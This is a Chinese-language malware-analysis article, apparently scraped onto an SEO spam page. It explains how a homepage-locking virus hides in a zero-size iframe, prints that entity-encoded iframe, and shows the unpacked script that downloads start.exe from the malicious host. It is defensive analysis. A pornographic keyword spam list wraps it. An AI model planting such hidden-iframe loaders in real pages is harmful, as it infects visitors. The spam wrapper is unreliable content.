亚洲天堂一级片-亚洲天堂三区-亚洲天堂久久精品成人-亚洲天堂毛片-久久国产欧美日韩高清专区-久久国产欧美日韩精品免费

面對網站惡意病毒我們該怎么辦?

  前不久,很多網友都感染了網站的病毒,首頁被改成這個網站,并且無法改回。黑客是如何做到鎖定用戶的瀏覽器首頁呢?下面我們就去探個究竟。

  提醒:分析病毒存在一定風險,建議在虛擬機下操作。

  第一步 查看病毒網站首頁的源代碼,可以發現在尾部有如下的字樣:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  這是一個嵌入到7b網址之家首頁的頁面,即打開網站也就同時打開了這個頁面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一個字符串,“&#”后面是每個字符串ASCII的十進制值。

  直接把這段亂碼保存為HTM文件,用IE打開,就可以看到它的真實面目“http : // m.dashow.com.cn / m.html”。

  第二步 查看http : // m.dashow.com.cn / m.html的源代碼,把看的<scrtipt>腳本段中的Execute替換為Document.Write,然后打開這個HTM頁面,就會出現一段代碼,同樣地,把EXECUTE換成我們無敵的Document.Write,前后加腳本標記,存HTM打開。屏幕上立即出現了一段令人眼花的東西。把眼花繚亂的東西整理一下,并將出現的CHR()在前面用到過,作用是把字符的ASCII轉成字符,只不過這次是16進制。然后再將字符拼接成字符串,然后再Execute運行這個命令字符串。繼續用Document.Write替換掉EXECUTE,前后加腳本標記,存HTM打開。

  第三步 經過上幾步的還原后終于看到了這個惡意頁面的最終面目。

  on error resume next curl = "http : // m.dashow.com.cn / start.exe"……其后省略。

  這段代碼中我們可以很清楚地看到http : // m.dashow.com.cn / start.exe這個鏈接。沒錯,它就是運行后可以將用戶主頁鎖定為網站的病毒。

  可以用下載工具將這個文件下載下來,如果你的殺毒軟件查不到的話最好立即上報。這樣可以保證殺毒軟件快速查殺這個病毒,并使更少的網友免受該病毒的侵害。

北大青鳥網上報名
北大青鳥招生簡章
主站蜘蛛池模板: 国产免费一区二区三区免费视频 | 欧美黑寡妇特a级做爰 | 看黄网址| 131美女爱做免费毛片 | 一个人看的www片免费视频中文 | 日本高清视频在线观看 | 亚洲精品一区专区 | 欧美成人 综合网播九公社 欧美成人26uuu欧美毛片 | 全免费毛片在线播放 | 日韩第一视频 | 久久频这里精品香蕉久久 | 日产日韩亚洲欧美综合搜索 | 成人三级精品视频在线观看 | 国产a一级毛片含羞草传媒 国产a自拍 | 国语精品视频在线观看不卡 | 一区二区三区国产美女在线播放 | 久草在线免费播放 | 日韩在线观看视频免费 | 日本www免费视频网站在线观看 | 美国一级欧美三级 | 99爱视频99爱在线观看免费 | 草久久免费视频 | 成 人 黄 色 视频播放16 | 洋老外米糕国产一区二区 | 三级com | 在线观看国内自拍 | 久草热视频在线观看 | 欧美日韩一区二区三区视视频 | 黄色在线网站 | 久久成年片色大黄全免费网站 | 一个人看的www日本视频 | 高清 国产 日韩 欧美 | 国产激情一区二区三区 | 久久久久久在线 | 91在线 | 亚洲 | 手机在线观看a | 欧美毛片一级的免费的 | 国产区一区二区三区 | 国产精品亚洲精品日韩已满 | 国产女人毛片 | 久草草视频在线观看免费高清 |